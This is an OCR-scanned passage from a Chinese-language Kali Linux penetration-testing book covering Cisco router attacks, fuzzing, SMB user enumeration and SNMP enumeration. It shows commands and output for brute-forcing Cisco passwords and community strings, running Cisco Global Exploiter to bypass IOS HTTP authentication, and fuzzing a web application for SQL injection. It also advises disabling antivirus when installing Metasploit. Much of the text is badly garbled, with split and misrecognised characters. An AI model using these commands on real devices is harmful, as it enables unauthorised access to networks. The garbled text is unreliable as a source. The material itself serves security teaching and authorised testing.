? Security Note he remote host as LOCAL/SYSTI 


P @ http (80/tcp) This alert might be a false pc 
b netbios-ns (137/udp) 

- P {Solution : Install Microsoft Patch 
> dà generaltcp : ttp:;//support microsoft .com/def 
> À ftp (21/tcp) Jen-us 
316333&sd-tech 
r disable the Microsoft SQL Sen 
? ntp (123/udp) S SQL port (1433). 


? smtp (25/tcp) 


isk factor : High 
? ms-wbt-server (3389) VE : CVE-2002-1123 
ID : 5411 


? ms-sql-m (1434/udp) ther references : IAVA:2002-B-( E 


mmirrmrm e de (Aa& en LE] 


b 
b 
b netbios-ssn (139/tcp) 
b 
b 
h 


HL =O [J 2] 
器 | >] Scan took place from Mon Aug 30 04:26:35 2010 to Mon Aug 30 04:29 


图 7.3 
7.4 Cisco 工 


Cisco 公司 是 顶级 网 络 设备 商 之 一 ， 目 前 大 多 公司 和 政府 机 构 都 采 
用 了 他 们 的 设备 。 对 于 Cisco 品 牌 的 设备 来 说 ， 它 们 比 其 他 品牌 的 设备 
面临 着 更 多 的 着 攻击 和 威胁 ; 而 对 于 攻击 人 员 来 说 ， 发 掘 这 个 品牌 设 
备 上 的 漏洞 也 比 挖掘 其 他 品牌 设备 的 漏洞 更 为 困难 。Cisco 品 牌 的 硬件 
有 路 由 器 、 交 换 机 、 安 全 设备 、 无 线 产 品 ， 软 件 产品 如 IOS、NX-OS、 
安全 设备 管理 器 、CiscoWorks、 统 一 通信 管理 器 等 。 可 以 说 ， 在 广 受 好 
评 的 技术 产品 中 ， 有 不 少 是 Cisco 品牌 的 产品 。 在 本 节 中 ， 我 们 将 演示 
Kali Linux 中 提供 的 针对 Cisco 产品 的 安全 测试 工具 。 


7.4.1 Cisco Auditing Tool 


Cisco Auditing Tool 简称 CAT， 属 于 小 型 的 安全 审计 工具 。 它 可 检 
测 出 Cisco 路 由 絮 上 的 常见 漏洞 ， 能 够 发 现 注 入 默认 密码 、 默 认 SNMP 
字符 串 和 老 版 本 IOS 上 存在 的 bug 问 题 。 

如 需 启 动 CAT， 可 在 菜单 里 依次 选中 Kali Linux | Vulnerability 
Analysis | Cisco Tools |cisco-auditing-tool ° 启动 终端 窗口 之 后 ， 您 将 看 
到 扫描 目标 主机 可 用 的 所 有 选项 。 如 果 您 打算 继续 使 用 终端 窗口 ， 可 
执行 下 述 指令 。 

# cd /usr/share/ 

# CAT —help 

上 述 指 令 将 显示 程序 的 全 部 选项 、 相 关 选 项 的 使 用 说 明和 功能 描 
述 。 它 扫 拉 Cisco 设备 的 选项 有 以 下 几 个 。 

e-h: 指定 主机 名 (在 扫描 单个 主机 的 时 候 使 用 该 选项 ) 。 

e-w: 指定 字典 文件 (以 猜测 团体 字符 串 ) 。 

o-a: 指定 密码 列表 (以 穷 举 密码 ) 。 

e-i: 及 lioshist] (检查 该 IOS 在 历史 上 出 现 过 的 bug) ° 

将 这 些 选 项 组 合 将 使 用 ， 可 以 暴力 破解 方式 探测 Cisco 设 备 的 密 
码 、 团 体 字符 串 和 可 能 会 再 现 的 上 日 有 IOS bug。 在 破解 密码 之 前 ， 要 更 
新 路 径 /pentestcisco/cisco-auditingtoollists 下 的 密码 列表 和 社区 字符 
串 ， 以 提高 破解 成 功 的 概率 。 而 后 ， 我 们 可 在 Kali Linux 的 终端 之 中 ， 
使 用 下 述 指 令 进 行 扫描 。 


# CAT -h ww.xx.yy.zz -w lists/community -a lists/passwords -i 


Cisco Auditing Tool - gOne [null0] 
Checking Host: ww.xx.yy.Zzz 
Guessing passwords: 

Invalid Password: diamond 
Invalid Password: cmaker 


Invalid Password: changeme 


Invalid Password: cisco 
Invalid Password: admin 
Invalid Password: default 
Invalid Password: Cisco 
Invalid Password: ciscos 
Invalid Password: cisco1 
Invalid Password: router 
Invalid Password: router1 
Invalid Password: Cisco 
Invalid Password: blender 


Password Found: pixadmin 


Guessing Community Names: 
Invalid Community Name: public 
Invalid Community Name: private 


Community Name Found: cisco 


如 需 编 辑 密码 字典 和 团体 字符 串 字 典 ， 可 在 执行 上 述 命令 之 前 ， 
在 终端 窗口 中 使 用 Vim 编辑 器 编辑 字典 文件 。Vim 编 辑 器 的 详细 介绍 ， 
可 通过 下 述 指令 进行 得 看 。 

# man vim 

Cisco 设 备 有 16 种 不 同 的 权限 级 别 ， 权 限 级 别 的 代码 从 0 (限制 最 严 
格 的 级 别 ) 到 15 (限制 最 少 的 级 别 ) 。 在 设置 Cisco 设 备 账户 的 时 候 ， 
每 个 账户 都 应 设置 相应 的 权限 等 级 。 如 需 更 详细 的 介绍 ， 请 参见 
http://www.cisco.com/en/US/docs/ios/12 2t/12 2t13/feature/guide/ftprienh. 
html ° 


7.4.2 Cisco Global Exploiter 


Cisco Global Exploiter (CGE) 是 小 型 的 Perl 脚本 程序 。 它 可 测试 
Cisco 设备 的 14 种 独立 的 漏洞 。 请 注意 只 有 特定 类 型 的 Cisco 设 备 才 会 
存在 这 些 漏 洞 ， 所 以 这 个 程序 不 能 完全 满足 Cisco 安 全 评估 的 全 部 需 
要 。 篇 幅 所 限 ， 本 书 不 会 逐个 讲解 每 个 漏洞 的 具体 信息 。 

如 需 启 动 CGE， 可 在 菜单 里 依次 选中 Kali Linux | Vulnerability 


Analysis | Cisco Tools |cisco-global-exploiter ， 或 在 终端 窗口 中 执行 下 述 
BA 5 
H^ 


# cd /usr/bin/ 

# cge.pl 

上 述 指 令 将 显示 程序 的 使 用 说 明 ， 并 会 按照 顺序 列 出 它 能 识别 的 
14 种 漏洞 。 例 如 ， 在 测试 Cisco 878 集成 服务 路 由 器 时 ， 我 们 可 以 使 用 
下 述 指令 。 

# cge.pl 10.200.213.25 3 

Vulnerability successful exploited with 
[http://10.200.213.25/level/17/exec/... ] ... 

alt fig t YETTBU ze 8 3 RM — Ml Cisco IOS HTTPAuth aif , 
而 且 程 序 成 功 地 利用 了 某 个 漏洞 。 进 行 深入 调查 之 后 ， 您 会 发 现 其 他 
类 型 的 Cisco 设 备 同样 存在 这 种 漏洞 ， 而 且 您 可 以 使 用 相似 的 手段 利用 
这 些 漏洞 。 利 用 漏洞 的 过 程 如 图 7.4 所 示 。 


] LaAntillana /level/15/exec/-/show/privilege/CR - Mo © 
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Home — Exec Configure 


Command [show privilege 


Out put 


Command base-URL was: /level/15/exec/- 
Complete URL was: /level/15/exec/- /show/privilege/CR 
Command was: show privilege 


Current privilege level is 15 


command completed. 


图 7.4 
有 X x ^ d d] By F A f Ho. d$ $2 W 
http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http- 
level.shtml ° 
可 见 ， 这 种 基于 HTTP 的 强行 访问 漏洞 可 让 入 侵 人 员 执 行路 由 器 
指令 ， 而 且 并 不 验证 他 们 的 身份 。 


7.5 Fuzz 分 析 工 具 


模糊 分 析 是 一 种 软件 测 斌 技术。 审计 人 员 和 开发 人 员 采 用 模糊 分 
析 技 术 ， 测 试 意外 数据 、 无 效 数据 和 随机 的 数据 输入 对 应 用 程序 的 影 
啊 。 人 们 关注 应 用 程序 在 模糊 测试 中 出 现 的 异常 状态 和 崩 江 问题 。 这 
种 测试 技术 可 深度 揭露 软件 所 隐 含 的 其 他 测试 手段 不 可 能 欣 掘 出 来 的 
漏洞 。 它 能 发 现 的 漏洞 有 绥 冲 区 洲 出 、 格 式 化 字符 串 、 代 码 注 入 、 述 
途 指 针 、 竞 争 条 件 、 拒 绝 服务 条 件 和 许多 其 他 类 型 的 漏洞 。 

Kali Linux 带 有 多 种 模糊 测试 工具 。 这 些 工具 可 以 测试 文件 格式 、 
网 络 协议 、 命 令 行 输入 、 环 境 变量 和 Web 应 用 。 不 可 信 的 数据 输入 源 都 
会 输入 不 安全 的 和 不 一 致 的 数据 。 例 如 ， Web 应 用 程序 和 互联 网 用 户 
之 间 的 信任 边界 不 可 预知 。 既 然 如 此 ， 歌 应当 对 所 有 可 能 的 数据 输入 
都 进行 尝试 (模糊 测试 ) ， 以 验证 已 知 和 未 知 的 漏洞 。 模 糊 分 析 是 一 
种 相对 人 简单 有 效 的 测 斌 方法， 可 用 于 质量 保证 和 安全 测试 。 由 于 这 个 
原因 ， 它 有 时 也 被 称 为 健壮 性 测试 (robustness testing) 或 否定 测试 

(negative testing) 。 

模 精 分析 的 天 键 步骤 是 什么 ? 

通常 认为 ， 模 糊 测 试 由 6 个 步骤 组 成 。 这 些 步骤 分 别 是 识别 目标 、 
识别 输入 、 生 成 模糊 测 斌 数据、 执行 模糊 数据 、 监 控 输 出 和 鉴别 问题 
的 可 利用 性 (是 否 是 exploit) 。 有 关 细 节 ， 请 参见 Fuzzing: Brute Force 
Vulnerability Discovery 的 ppt 文 件 。 该 文件 可 在 下 述 网 址 下 载 : 


http://recon.cx/en/f/msutton-fuzzing.ppt ° 


7.5.1 BED 


Bruteforce Exploit Detector (BED) 是 纯 文本 协议 的 模糊 测试 工 
具 ， 用 于 检测 软件 常见 漏洞 。 它 可 以 检测 出 缓冲 区 洲 出 漏洞 、 格 式 化 
字符 串 漏洞 、 整 数 洲 出 、DoS 条 件 等 漏洞 。BED 程序 可 以 根据 指定 的 
协议 ， 目 动 发 送 仿 有 问题 字符 串 的 命令 组 合 ， 以 测试 目标 的 处 理 方 


式 。 它 目前 支持 的 协议 包括 ftp、smtp ^ pop ^ http ` irc ^ imap ` pjl ^ 
Ipd ` finger ` socks4#llsocks5 ° 
如 需 启 动 BED 程序 ， 可 在 亲 单 中 依次 选中 Kali Linux | Vulnerability 
Analysis | Fuzzing Tools | bed， 或 者 在 shell 中 使 用 下 壕 指 令 。 
# cd /usr/share/bed/ 
# bed.pl 
上 述 指 令 将 显示 它 的 使 用 说 明 。 如 需 查 看 某 个 协议 的 插件 的 详细 
说 明 ， 可 使 用 下 述 指令 。 
# bed -s FTP 
该 指令 将 介绍 FTP 插件 的 参数 。 在 进行 测试 之 前 ， 我 们 通过 该 指 
令 了 解 到 这 个 插件 需要 -u 用 户 名 和 -v 密 码 这 两 个 参数 。 接 下 来 ， 我 们 利 
用 BED 测 试 目 标 系 统 的 FTP 守 护 进程 。 
# bed -s FTP -u ftpuser -v ftpuser -t 192.168.0.7 -p 21 -0 3 
BED 0.5 by mjm( www.codito.de ) & eric ( www.snake-basket.de) 
* Buffer overflow testing: 
testing: 1 USER XAXAX . .......... 
testing: 2 USER ftpuserPASS XAXAX ........... 
* Formatstring testing: 
testing: 1 USER XAXAX  ..... 
testing: 2 USER ftpuserPASS XAXAX ........ 
* Normal tests 
* Buffer overflow testing: 
testing: 1 ACCT XAXAX . . ......... 
testing: 2 APPE XAXAX . . .......... 
testing: 3 ALLO XAXAX . ......... 
testing: 4 CWD XAXAX . ....... 
testing: 5 CEL XAXAX . . ........ 


testing: 6 DELE XAXAX  . ........ 
testing: 7 HELP XAXAX  . ......... 
testing: 8 MDIM XAXAX . . .......... 
testing: 9 MLST XAXAX .  ........ 


testing: 10 MODE XAXAX ......... 
testing: 11 MKD XAXAX ........ 
testing: 12 MKD XAXAXCWD XAXAX  ........... 
testing: 13 MKD XAXAXDELE XAXAX . .......... 
testing: 14 MKD XAXAXRMD XAXAX  .... connection 
attempt failed: No route to host 
上 述 信息 表明 ，FTP 守 护 程序 在 第 14 项 测试 的 时 候 中 断 了 连接 。 这 
可 能 是 个 庶 在 的 缓冲 区 溢出 问题 。 但 是 我 们 还 需要 调查 特定 测试 模 
块 ， 检 查 测 试 指 令 (参考 文件 /pentest/fuzzers/bed/bedmod/ftp.pm) ， 以 
进行 进一步 调查 。 将 目标 程序 恢复 到 正常 状态 再 进行 两 次 重复 试验 、 
增加 BED 的 超时 时 间 (-o) ， 都 是 确认 问题 可 重复 出 现 的 良好 习惯 。 
2.5.2 JBroFuzz 


JBroFuzz 是 对 Web 应 用 程序 进行 模糊 测试 的 著名 平台 。 它 可 模拟 
HTTP 协 议和 HTTPS 协 议 的 Web 请 求 。 获 悉 要 测试 的 域名 和 测试 的 URL 
部 分 之 后 ， 审 计 人 员 可 以 自己 手工 构造 测试 的 请 求 ， 也 可 以 使 用 程序 
预定 义 的 payload 数 据 库 ， 生 成 基于 已 知 漏洞 的 恶意 请 求 ， 再 把 这 些 请 
求 发 送 到 目标 服务 器 以 进行 模糊 测试 。JbroFuzz 的 数据 库 能 够 帮助 审 
计 人 员 进 行 XSS、SQL 注入 、 缓 冲 区 溢出 、 格 式 字符 串 错 误 等 问题 的 
自动 化 测试 而后， 程序 会 记录 目标 的 相应 回复 ， 以 供 进一步 检查 。 
基于 执行 测试 的 类 型 ， 审 计 人 员 应 当 手 动 调查 服务 器 的 响应 或 结 
以 便 识 别 出 任 何 可 能 存在 的 漏洞 。 


JBroFuzz 的 关键 功 能 包括 模 灶 管理 、payload 的 分 类 处 理 、 通 过 浏 
宽 器 的 代理 服务 器 嗅 探 Web 请 求 和 回复 、 枚 举 网 站 目录 等 。 这 些 功能 
都 是 应 用 协议 模糊 测试 不 可 或 缺 的 组 成 部 分 

如 需 局 动 JBroFuzz 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# cd /usr/share/zaproxy/lib/jbrofuzz/ 

# java -jar JBroFuzz.jar 

JBroFuzz 界面 之 中 有 大 量 的 选项 设置 ， 这 些 选 项 都 有 详细 的 描述 
和 说 明 。 如 果 您 需要 查看 帮助 ， 可 在 菜单 栏 中 选择 Help | Topics， 进 入 
图 7.5 所 示 的 界面 。 

接 下 来 ， 我 们 通过 下 述 步骤 测试 一 个 web 应 用 程序 。 

1. 设 定 目 标 域 的 URL 为 http://testasp.targetdomain.com。 这 是 一 个 基 
于 ASP 的 Web 应 用 程序 。 为 满足 测试 需求 的 实际 需要 ， 我 们 还 要 在 
Request 面 板 中 将 HTTP 请 求 调整 为 如 下 所 示 。 


JBroFuzz - Untitled — = dw 
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图 7.5 
GET /showthread.asp?id=4 HTTP/1.0 
Host: testasp.example.com 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; 
rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 
Accept: text/html, application/xhtml+xml,application/ 
xml;q=0.9,*/*;q=0.8 


Accept-Language: en-gb,en;q=0.5 

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 

2. 在 构造 测试 请 求 数据 之 前 ， 我 们 已 经 知道 这 人 台 有 上 服务器 上 存在 一 
个 URL: http://testasp.example.com/showthread.asp?id=4 ° 

3. 创建 一 个 手工 构造 的 测试 请 求 ， 并 选择 URL 的 一 部 分 (id=4) xf 
行 SQL 注入 的 测试 。 

4. 选中 第 一 行 里 的 数字 值 4， 然 后 点 击 顶 部 菜单 条 里 的 加 号 (+) 
按钮 。 

5. 在 新 弹出 的 窗口 里 ， 选 择 SQL injection 分 类 ， 并 设置 模糊 测试 的 
名 称 为 SQL Injection， 然 后 点 击 Add Fuzzer 按 钮 。 

6. 设置 好 模糊 测试 任务 之 后 ， 主 程序 窗口 的 右 侧 边 角 的 Added 
Payloads Table 标 签 里 ， 将 会 显示 这 个 测试 任务 。 

如 果 您 的 操作 完全 遵循 上 述 步 又 ， 那 么 您 现在 就 可 以 对 日 标 主 机 
的 Web 应 用 程序 进行 SQL 注 入 漏洞 的 模糊 测试 。 

可 通过 菜单 Panel | Start 或 快捷 键 Ctrl+Enter 启 动 测试 任务 。 在 程序 
处 理 测 试 请 求 的 时 候 ， 您 将 在 Request 面 板 里 看 到 程序 发 送 的 请 求 。 另 
外 ， 如 果 要 观察 每 个 HTTP/HTTPS 的 处 理 进度 ， 可 点 击 On The Wire 标 
签 宜 看 。 在 它 完 成 模糊 测试 之 后 ， 可 调查 每 个 测试 请 求 的 啊 应 结果 。 
可 在 Output 窗口 中 使 用 鼠标 右键 点 击 特定 的 服务 器 响应 ， 然 后 选择 
Open in Browser 选 项 。 目 标 对 我 们 发 送 的 测试 请 求 返 回 了 下 述 信 息 ， 它 
很 可 能 是 SQL 注入 漏洞 的 现象 。 

HTTP/1.1 500 Internal Server Error Connection:close Date: Sat, 04 

Sep 2013 21:59:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: 

ASPNET Content-Length: 302 Content-Type: text/html Set-Cookie: 

ASPS ESSIONIDQADTCRCB=KBLKHENAJBNNKIOKKAJJFCDI; 
path=/ Cache-control: private 
Microsoft SQL Native Client error '80040e14' 


Unclosed quotation mark after the character string ". 

/showthread.asp, line 9 

在 Windows 系 统 中 安装 Metasploit 时 ， 应 该 禁用 防 病毒 软件 ， 因 为 
有 些 安装 文件 会 被 其 检测 为 潜在 的 病毒 或 威胁 ， 从 而 阻塞 安装 过 程 。 
有 Xx 这 个 程序 的 详细 d Ro. 请 y) 
http://wiki191.0wasp.org/index.php/Category:DOWASP JbroFuzz ° 


7.6 SMBZHITLA 
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Server Message Block (SMB) 是 应 用 层 协 议 ， 通 常用 于 文件 和 打 
印 机 共享 服务 。 些 外， 它 还 可 将 网 络 中 不 同 节点 的 串口 服务 和 其 他 通 
信 协 议 共 享 。SMB 又 称 为 CIFS (Common Internet File System) 

SMB 采 用 了 单纯 的 客户 端 /服务 右 的 CS 以 构 ， 而 且 兼 容 Linuxz 和 
Windows 等 多 种 平台 。NetBIOS (Network BasicInput Output System) 是 
SMB 协议 的 组 成 部 分 ， 用 于 Windows 系 统 的 传输 服务 。NetBIOS 工作 
T TCP/IP 协议 (NBT) ， 因 此 同一 局 域 网 内 的 每 全 电脑 都 可 通过 唯一 
的 网 络 名 称 和 IP 地 址 与 男 一 台电 脑 进 行 通信 。 

此 外 ， 对 于 DEC/RPC 服 务 程序 实现 的 网 络 节 点 间 IPC ( 跨 进 程 通 
fi) 而 言 ， 其 认证 通道 同样 使 用 SMB 协 议 。 也 就 是 说 ， 不 同 电脑 、 不 
同 进程 间 都 可 通过 SMB 的 认证 通道 进行 数据 交换 。NetBIOS 服 务 通 常 在 
不 同 的 TCP 端 口 和 UDP 端口 (135、137、138、139、445) 上 提供 不 同 
的 服务 。 因 为 SMB 功 能 强大 而 防护 能 力 脆弱 ， 所 以 它 是 黑客 的 首要 攻 
击 目 标 。 人们 曾经 曝光 了 SMB 协 议 的 大 量 漏洞 ， 这 些 漏洞 都 为 入 侵 者 
北 开 了 方便 之 门 。 本 廊 将 介绍 获取 SMB 信 息 的 多 个 工具 ， 它 们 可 获取 
主机 名 、 运 行 服务 、 域 控制 器 、MAC 地 址 、 操 作 系 统 类 型 、 当 前 登录 
用 户 、 隐 藏 共享 、 时 间 人 信息、 用 户 群 组 、 当 前 会 话 、 打 印 机 、 可 用 磁 


Ege fs 
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如 需 了 解 SMB、NetBIOS 和 相关 协议 的 详细 信息 ， 请 参见 
http://timothydevans.me.uk/nbf2cifs/book1.html ° 

ImpacketSamrdump 

Samrdump 是 获取 主机 敏感 信息 的 工具 。 它 通过 DCE/RPC 

(Distributed Computing Environment/Remote Procedure Call) 服务 调用 

SAM (安全 账户 管理 器 ，Security Account Manager) 的 远程 接口 ， 继 
而 获取 信息 。 它 可 列举 同一 局 域 网 内 的 目标 主机 上 的 所 有 的 系统 共 
人 享 、 用 户 账 户 和 其 他 信息 。 

如 需 启 动 InpacketSamrdump， 可 在 shell 中 执行 下 述 指令 。 


# cd /usr/share/doc/python-impacket-doc/examples/samrdump.py 


# python samrdump.py 

上 述 指 令 将 显示 它 的 使 用 说 明和 必要 的 语法 简介 。 人 简单 的 说 ， 
python samrdump.py user:pass@ip porUSMB 这 样 的 指令 天 可 对 指定 目标 
的 指定 端口 (139 或 445) 进行 检测 。 

# python samrdump.py h4x:123@192.168.0.7 445/SMB 

Retrieving endpoint list from 192.168.0.7 

Trying protocol 445/SMB... 

Found domain(s): 

. CUSTDESK 
. Builtin 

Looking up users in domain CUSTDESK 

Found user: Administrator, uid = 500 

Found user: ASPNET, uid = 1005 

Found user: Guest, uid = 501 

Found user: h4x, uid = 1010 

Found user: HelpAssistant, uid = 1000 

Found user: [USR_MODESK, uid = 1004 


Found user: IWAM, MODESK, uid = 1009 
Found user: MoDesktop, uid = 1003 

Found user: SUPPORT. 388945a0, uid = 1002 
Administrator (500)/Enabled: true 


上 述 指令 列 出 了 远程 主机 上 的 全 部 用 户 名 。 在 Samrdump 的 指令 之 
中 ， 目 标 主 机 的 用 户 名 和 密码 并 不 是 必 选 项 ;在 指定 用 户 名 和 密码 
时 ， 该 指令 将 能 返回 其 他 方式 获取 不 到 的 更 多 信息 。 利 用 上 述 信息 ， 
我 们 可 检查 在 共享 文件 中 搜索 敏感 数据 ， 访 问 其 他 用 户 ， 进 而 揭示 更 
有 价值 的 信息 。 


7.7 SNMP L 


SNMP (Simple Network Management Protocol) 是 一 个 运行 于 UDP 
协议 161 端口 的 应 用 层 协 议 。SNMP 协议 主要 用 于 网 络 设备 运行 状态 的 
监控 ， 以 关注 需要 管理 员 干 预 的 事件 ， 及 时 了 解 诸 如 电源 断 电 、 网 络 
不 可 达 等 网 络 运行 情况 。 采 用 了 SNMP 管 理 技 术 的 网 络 结构 ， 通 常 由 网 
络 设备 、 管 理 病 和 代理 问 组 成 。 

管理 端 程序 负责 网 络 管理 和 状态 监控 的 管理 任务 。 代 理 端 是 网 络 
设备 运行 的 软件 。 可 运行 客户 端 程序 的 网 络 设备 包括 文 持 SNMP 协 议 路 
由 器 、 交 换 机 、 集 线 右 、 网 络 摄像 头 、 网 桥 ， 以 及 安装 客户 端 程序 的 
操作 系统 (Linux ^ Windows) 主机 。 安 装 了 代理 端 程序 的 设备 通过 
SNMP 协 议 回 管理 病 报 告 设备 市 宽 、 正 背 运 行 时 间 、 运行 进程 、 网 络 接 
口 、 系 统 服务 等 数据 信息 。SNMP 信息 通过 多 个 变量 分 别 描述 了 系统 
不 同方 面 的 配置 情况 。SNMP 信息 采用 MIB (Management Information 
Base) 的 层次 结构 方式 组 织 消息 中 的 各 种 变量 ， 每 个 变量 有 确定 的 唯 


一 对 象 标识 符 (Object Identifier, OID) ° SNMP 协议 共有 三 个 版 本 ， 
即 v1、v2 和 v3。 

以 安全 角度 看 ，VL 和 v2 版 本 的 方案 均 是 通过 团体 字符 串 实 现 安 全 防 
护 。 而 v3 在 保密 性 、 人 完整 性 和 号 份 验证 方面 的 功能 更 好 。 本 文 介绍 的 
工具 主要 针对 基于 VvI 和 v2c 的 SNMP 设 备 。 

如 需 深 入 了 解 SNMP 协议 ， 请 参见 http://www. tech- 
faq.com/snmp.html ° 

SNMP Walk 

SNMP Walk 是 一 个 功能 强大 的 SNMP 信 息 采 集 工 具 。 它 可 依据 设备 
类 型 提取 所 有 配置 数据 。 这 些 信息 将 对 攻击 的 后 续 工 作 非 党 有 用 。 此 
Sb, SNMP Walk 可 针对 性 地 获取 单 组 MIB 数 据 或 特定 OID 值 。 

如 需 局 动 SNMP Walk 程序 ， 可 在 终端 中 使 用 下 述 指 令 。 

# snmpwalk 

上 述 命 令 将 显示 该 程序 的 使 用 说 明和 选项 说 明 。SNMP Walk 可 以 
使 用 三 种 不 同 版 本 的 SNMP 协 议 〈 即 VL、v2c 和 v3) ， 这 也 是 它 的 主要 
优势 所 在 。 在 远程 设备 使 用 的 SNMP 协 议 不 能 向 下 兼容 时 ， 这 一 优势 将 
发 挥 作 用 。 本 例 将 使 用 下 述 指令 ， 在 指令 行 中 分 别 以 v1 和 v2c 厂 本 的 
SNMP 协 议 获取 远程 主机 的 信息 。 

# snmpwalk -v 2c -c public -O T -L f snmpwalk.txt 10.20.127.49 

SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 
Model 4 

Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 5.2 
(Build 3790 Multiprocessor Free) 


SNMPv2-MIB::sysObjectID.O = OID: SNMPv2- 
SMI::enterprises.311.1.1.3.1.2 
DISMAN-EVENT-MIB::sysUpTimelInstance = Timeticks: 


(1471010940) 170 days, 6:08:29.40 


SNMPv2-MIB::sysContact.0 = STRING: 

SNMPv2-MIB::sysName.0 = STRING: CVMBC-UNITY 

SNMPv2-MIB::sysLocation.0 = STRING: 

SNMPv2-MIB::sysServices.0 = INTEGER: 76 

IF-MIB::ifNumber.0 = INTEGER: 4 

IF-MIB::ifIndex.1 = INTEGER: 1 

IF-MIB::ifIndex.65538 = INTEGER: 65538 

IF-MIB::ifIndex.65539 = INTEGER: 65539 

IF-MIB::ifIndex.65540 = INTEGER: 65540 

IF-MIB::ifDescr.1 = STRING: Internal loopback interface for 127.0.0 
network 

IF-MIB::ifDescr.65538 = STRING: Internal RAS Server interface for 
dial in clients 

IF-MIB::ifDescr.65539 = STRING: HP NC7782 Gigabit Server 
Adapter #2 

IF-MIB::ifDescr.65540 
Adapter 

IF-MIB::ifType.1 = INTEGER: softwareLoopback(24) 

IF-MIB::ifType.65538 = INTEGER: ppp(23) 

IF-MIB::ifType.65539 = INTEGER: ethernetCsmacd(6) 

IF-MIB::ifType.65540 = INTEGER: ethernetCsmacd(6) 

IF-MIB::ifMtu.1 = INTEGER: 32768 

IF-MIB::ifMtu.65538 = INTEGER: 0 

IF-MIB::ifMtu.65539 - INTEGER: 1500 


STRING: HP NC7782 Gigabit Server 


IF-MIB::ifPhysAddress.65539 = STRING: 0:13:21:c8:69:b2 
IF-MIB::ifPhysAddress.65540 = STRING: 0:13:21:c8:69:b3 


IF-MIB::ifAdminStatus.1 = INTEGER: up(1) 


IP-MIB::ipAdEntAddr.127.0.0.1 = IpAddress: 127.0.0.1 
IP-MIB::ipAdEntAddr.192.168.1.3 = IpAddress: 192.168.1.3 
IP-MIB::ipAdEntAddr.192.168.1.100 = IpAddress: 192.168.1.100 
IP-MIB::ipAdEntAddr.10.20.127.52 = IpAddress: 10.20.127.52 
IP-MIB::ipAdEntIfIndex.127.0.0.1 = INTEGER: 1 
IP-MIB::ipAdEntIfIndex.192.168.1.3 = INTEGER: 65540 
IP-MIB::ipAdEntIfIndex.192.168.1.100 = INTEGER: 65538 
IP-MIB::ipAdEntIfIndex.10.20.127.52 = INTEGER: 65539 
IP-MIB::ipAdEntNetMask.127.0.0.1 = IpAddress: 255.0.0.0 
IP-MIB::ipAdEntNetMask.192.168.1.3 = IpAddress: 255.255.255.0 
IP-MIB::ipAdEntNetMask.192.168.1.100 = IpAddress: 
255.255.255.255 
IP-MIB::ipAdEntNetMask.10.20.127.52 = IpAddress: 255.255.255.248 
IP-MIB::ipAdEntBcastAddr.127.0.0.1 = INTEGER: 1 
IP-MIB::ipAdEntBcastAddr.192.168.1.3 = INTEGER: 1 
IP-MIB::ipAdEntBcastAddr.192.168.1.100 = INTEGER: 1 
IP-MIB::ipAdEntBcastAddr.10.20.127.52 = INTEGER: 1 
IP-MIB::ipAdEntReasmMaxSize.127.0.0.1 = INTEGER: 65535 
IP-MIB::ipAdEntReasmMaxSize.192.168.1.3 = INTEGER: 65535 
IP-MIB::ipAdEntReasmMaxSize.192.168.1.100 = INTEGER: 65535 
IP-MIB::ipAdEntReasmMaxSize.10.20.127.52 = INTEGER: 65535 
RFC1213-MIB::ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0 
RFC1213-MIB::ipRouteDest.127.0.0.0 = IpAddress: 127.0.0.0 
RFC1213-MIB::ipRouteDest.127.0.0.1 = IpAddress: 127.0.0.1 
RFC1213-MIB::ipRouteDest.192.168.1.0 = IpAddress: 192.168.1.0 


RFC1213-MIB::ipRouteDest.192.168.1.3 = IpAddress: 192.168.1.3 


RFC1213-MIB::ipRouteDest.192.168.1.100 - IpAddress: 
192.168.1.100 
RFC1213-MIB::ipRouteDest.192.168.1.255 = IpAddress: 


192.168.1.255 
RFC1213-MIB::ipRouteDest.10.20.127.48 = IpAddress: 10.20.127.48 
RFC1213-MIB::ipRouteDest.10.20.127.52 = IpAddress: 10.20.127.52 
RFC1213-MIB::ipRouteDest.10.20.127.255 = IpAddress: 
10.20.127.255 
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项 -c 用 于 指定 提取 MIB 所 需 的 团体 字符 串 ，-O 选项 将 输出 结果 以 可 读 
的 文本 (T) 形式 进行 输出 ， 工 选项 将 数据 保存 为 文件 (f 
snmpwalk.txt) 。 如 需 详 细 了 解 SNMP Walk 各 种 使 用 方法 ， 可 访问 网 址 
http://net-snmp.sourceforge.net/wiki/index.php/TUT:snmpwalk。 渗透 测试 
人 员 获 取 的 信息 量 越 多 ， 他 们 对 目标 网 络 架 构 理 解 得 越 透彻 。 


7.8 Web 程 序 分 析 工 具 


现在 的 应 用 程序 大 多 采用 了 多 种 Web 技 术 ， 这 不 仅 增加 了 程序 问题 
的 复杂 性 ， 而 且 增 加 了 敏感 数据 泄露 的 风险 。 一 直 以 来 ，Web 应 用 程 
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挑战 。Web 应 用 程序 (Biim) 和 数据 库 (后 端 ) 都 是 加 固 网 络 安全 的 
重点 。Web 应 用 程序 扮演 着 数据 处 理 系 统 的 角色 ， 而 数据 库 负 责 存 储 敏 
感 数据 〈 例 如 信用 卡号 、 用 户 信息 、 认 证 数据 等 ) ， 所 以 两 者 的 安全 
性 部 要 兼顾 。 


本 节 把 Web 应 用 程序 的 安全 分 析 分 为 “Web 应 用 程序 测试 ”和 “数据 
库 测 斌 ”两 个 部 分 。 虽 然 如 此 ， 我 们 应 该 非 篆 清楚 二 者 之 间 的 关系， 以 
及 它们 组 成 的 复合 技术 架构 。Kali Linux 提供 了 多 款 能 够 对 Web 应 用 
程序 和 数据 库 程 序 进行 综合 评 佑 分 析 的 安全 评估 工具 。 也 就 是 说 ， 有 
些 工 具 能 够 通过 Web 应 用 程序 ( 即 前 端 ) 攻击 后 台数 据 库 (如 SQL 注 
入 ) 


7.8.1 评估 工 


本 市 将 介绍 Kali Linux 的 三 款 数据 库 分 析 工 具 。 这 三 款 分 机 工具 分 
别 用 于 MS-SQL ` MySQL 和 Oracle 数据 库 的 安全 测试 。 本 文 会 逐一 演 
示 它 们 的 基本 功能 和 功能 。 这 些 工 具 主 要 用 于 数据 库 的 指纹 指纹 、 服 
